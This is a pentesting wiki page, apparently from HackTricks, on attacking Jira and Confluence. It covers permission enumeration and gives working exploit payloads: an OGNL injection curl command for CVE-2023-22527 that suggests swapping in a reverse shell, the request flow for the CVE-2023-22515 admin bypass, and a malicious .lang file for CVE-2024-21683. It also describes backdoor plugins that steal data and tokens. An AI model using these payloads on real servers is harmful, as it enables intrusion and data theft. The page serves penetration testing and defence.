jira.md (9296B)
1 --- 2 title: "Jira & Confluence" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-web/jira.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/jira.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Jira & Confluence 14 15 ## Check Privileges 16 17 In Jira, **privileges can be checked** by any user, authenticated or not, through the endpoints `/rest/api/2/mypermissions` or `/rest/api/3/mypermissions`. These endpoints reveal the user's current privileges. A notable concern arises when **non-authenticated users hold privileges**, indicating a **security vulnerability** that could potentially be eligible for a **bounty**. Similarly, **unexpected privileges for authenticated users** also highlight a **vulnerability**. 18 19 An important **update** was made on **1st February 2019**, requiring the 'mypermissions' endpoint to include a **'permission' parameter**. This requirement aims to **enhance security** by specifying the privileges being queried: [check it here](https://developer.atlassian.com/cloud/jira/platform/change-notice-get-my-permissions-requires-permissions-query-parameter/#change-notice---get-my-permissions-resource-will-require-a-permissions-query-parameter)<sup>[[3]](#references)</sup> 20 21 - ADD_COMMENTS 22 - ADMINISTER 23 - ADMINISTER_PROJECTS 24 - ASSIGNABLE_USER 25 - ASSIGN_ISSUES 26 - BROWSE_PROJECTS 27 - BULK_CHANGE 28 - CLOSE_ISSUES 29 - CREATE_ATTACHMENTS 30 - CREATE_ISSUES 31 - CREATE_PROJECT 32 - CREATE_SHARED_OBJECTS 33 - DELETE_ALL_ATTACHMENTS 34 - DELETE_ALL_COMMENTS 35 - DELETE_ALL_WORKLOGS 36 - DELETE_ISSUES 37 - DELETE_OWN_ATTACHMENTS 38 - DELETE_OWN_COMMENTS 39 - DELETE_OWN_WORKLOGS 40 - EDIT_ALL_COMMENTS 41 - EDIT_ALL_WORKLOGS 42 - EDIT_ISSUES 43 - EDIT_OWN_COMMENTS 44 - EDIT_OWN_WORKLOGS 45 - LINK_ISSUES 46 - MANAGE_GROUP_FILTER_SUBSCRIPTIONS 47 - MANAGE_SPRINTS_PERMISSION 48 - MANAGE_WATCHERS 49 - MODIFY_REPORTER 50 - MOVE_ISSUES 51 - RESOLVE_ISSUES 52 - SCHEDULE_ISSUES 53 - SET_ISSUE_SECURITY 54 - SYSTEM_ADMIN 55 - TRANSITION_ISSUES 56 - USER_PICKER 57 - VIEW_AGGREGATED_DATA 58 - VIEW_DEV_TOOLS 59 - VIEW_READONLY_WORKFLOW 60 - VIEW_VOTERS_AND_WATCHERS 61 - WORK_ON_ISSUES 62 63 Example: `https://your-domain.atlassian.net/rest/api/2/mypermissions?permissions=BROWSE_PROJECTS,CREATE_ISSUES,ADMINISTER_PROJECTS` 64 65 ```bash 66 #Check non-authenticated privileges 67 curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"havePermission": true' 68 ``` 69 70 ## Automated enumeration 71 72 - [https://github.com/0x48piraj/Jiraffe](https://github.com/0x48piraj/Jiraffe) 73 - [https://github.com/bcoles/jira_scan](https://github.com/bcoles/jira_scan) 74 75 ## Recent RCEs & practical exploit notes (Confluence) 76 77 ### CVE-2023-22527 – unauthenticated template/OGNL injection (10.0) 78 79 * Affects Confluence Data Center/Server 8.0.x–8.5.3 & 8.4.5. Vulnerable Velocity template `text-inline.vm` allows OGNL evaluation without authentication.<sup>[[1]](#references)</sup> 80 * Quick PoC (command runs as confluence user): 81 82 ```bash 83 curl -k -X POST "https://confluence.target.com/template/aui/text-inline.vm" \ 84 -H 'Content-Type: application/x-www-form-urlencoded' \ 85 --data 'label=aaa%27%2b#request.get("KEY_velocity.struts2.context").internalGet("ognl").findValue(#parameters.poc[0],{})%2b%27&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader("x-cmd",(new+freemarker.template.utility.Execute()).exec({"id"}))' 86 ``` 87 88 * Response header `x-cmd` will contain the command output. Swap `id` for a reverse shell payload. 89 * Scanner: nuclei template `http/cves/2023/CVE-2023-22527.yaml` (ships in nuclei-templates ≥9.7.5). 90 91 ### CVE-2023-22515 – setup reactivation admin creation (auth bypass) 92 93 * Publicly reachable Confluence Data Center/Server 8.0.0–8.5.1 allows flipping `setupComplete` and re‑running `/setup/setupadministrator.action` to create a new admin account.<sup>[[2]](#references)</sup> 94 * Minimal exploit flow: 95 1. `GET /server-info.action` (unauthenticated) to ensure reachability. 96 2. `POST /server-info.action` with `buildNumber` parameters to toggle setup flag. 97 3. `POST /setup/setupadministrator.action` with `fullName`, `email`, `username`, `password`, `confirm` to spawn an admin. 98 99 ### CVE-2024-21683 – authenticated RCE via Code Macro upload 100 101 * A Confluence administrator can upload a crafted language definition through **Configure Code Macro**; affected versions pass tainted content to the Rhino script engine, leading to RCE.<sup>[[6]](#references)</sup> 102 * For a shell, upload a `.lang` file containing payload like: 103 104 ```xml 105 <?xml version="1.0"?> 106 <languages> 107 <language key="pwn" name="pwn" namespace="java.lang"> 108 <tokens> 109 <token scope="normal">${"".getClass().forName("java.lang.Runtime").getRuntime().exec("id")}</token> 110 </tokens> 111 </language> 112 </languages> 113 ``` 114 115 * Trigger by selecting the malicious language in any Code Macro body. Metasploit module `exploit/multi/http/atlassian_confluence_rce_cve_2024_21683` automates auth + upload + exec. 116 117 ## Atlassian Plugins 118 119 As indicated in this [**blog**](https://cyllective.com/blog/posts/atlassian-audit-plugins)<sup>[[4]](#references)</sup>, in the documentation about [Plugin modules ↗](https://developer.atlassian.com/server/framework/atlassian-sdk/plugin-modules/) it's possible to check the different types of plugins, like: 120 121 - [REST Plugin Module ↗](https://developer.atlassian.com/server/framework/atlassian-sdk/rest-plugin-module): Expose RESTful API endpoints 122 - [Servlet Plugin Module ↗](https://developer.atlassian.com/server/framework/atlassian-sdk/servlet-plugin-module/): Deploy Java servlets as part of a plugin 123 - [Macro Plugin Module ↗](https://developer.atlassian.com/server/confluence/macro-module/): Implement Confluence Macros, i.e. parameterised HTML templates 124 125 This is an example of the macro plugin type: 126 127 <details> 128 <summary>Macro plugin example</summary> 129 130 ```java 131 package com.atlassian.tutorial.macro; 132 133 import com.atlassian.confluence.content.render.xhtml.ConversionContext; 134 import com.atlassian.confluence.macro.Macro; 135 import com.atlassian.confluence.macro.MacroExecutionException; 136 137 import java.util.Map; 138 139 public class helloworld implements Macro { 140 141 public String execute(Map<String, String> map, String body, ConversionContext conversionContext) throws MacroExecutionException { 142 if (map.get("Name") != null) { 143 return ("<h1>Hello " + map.get("Name") + "!</h1>"); 144 } else { 145 return "<h1>Hello World!<h1>"; 146 } 147 } 148 149 public BodyType getBodyType() { return BodyType.NONE; } 150 151 public OutputType getOutputType() { return OutputType.BLOCK; } 152 } 153 ``` 154 155 </details> 156 157 It's possible to observe that these plugins might be vulnerable to common web vulnerabilities like XSS. For example the previous example is vulnerable because it's reflecting data given by the user. 158 159 Once a XSS is found, in [**this github repo**](https://github.com/cyllective/XSS-Payloads/tree/main/Confluence) you can find some payloads to increase the impact of the XSS. 160 161 ## Backdoor Plugin 162 163 [**This post**](https://cyllective.com/blog/posts/atlassian-malicious-plugin) describes different (malicious) actions that could perform a malicious Jira plugin.<sup>[[5]](#references)</sup> You can find [**code example in this repo**](https://github.com/cyllective/malfluence). 164 165 These are some of the actions a malicious plugin could perform: 166 167 - **Hiding Plugins from Admins**: A malicious plugin can inject front-end JavaScript that hides the plugin from administrators. 168 - **Exfiltrating Attachments and Pages**: A plugin can access and exfiltrate Confluence data available to its execution context. 169 - **Stealing Session Tokens**: A plugin can add an endpoint that echoes request headers and JavaScript that sends session data to it. 170 - **Command Execution**: A malicious server-side plugin can execute operating-system commands. 171 - **Reverse Shell**: Or get a reverse shell. 172 - **DOM Proxying**: If the confluence is inside a private network, it would be possible to establish a connection through the browser of some user with access to it and for example contact the server command executing through it. 173 174 ## References 175 176 - [1] [Atlassian advisory – CVE-2023-22527 template injection RCE](https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-datacenter-and-confluence-server-1333990257.html) 177 - [2] [CISA AA23-289A – Active exploitation of Confluence CVE-2023-22515](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-289a) 178 - [3] [Atlassian – 'mypermissions' resource requires a permissions query parameter](https://developer.atlassian.com/cloud/jira/platform/change-notice-get-my-permissions-requires-permissions-query-parameter/#change-notice---get-my-permissions-resource-will-require-a-permissions-query-parameter) 179 - [4] [Auditing Atlassian Plugins, 53 0-Days Later](https://cyllective.com/blog/posts/atlassian-audit-plugins) 180 - [5] [Creating a Malicious Atlassian Plugin](https://cyllective.com/blog/posts/atlassian-malicious-plugin) 181 - [6] [Rapid7 – Atlassian Confluence Administrator Code Macro RCE (CVE-2024-21683)](https://www.rapid7.com/db/vulnerabilities/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683/)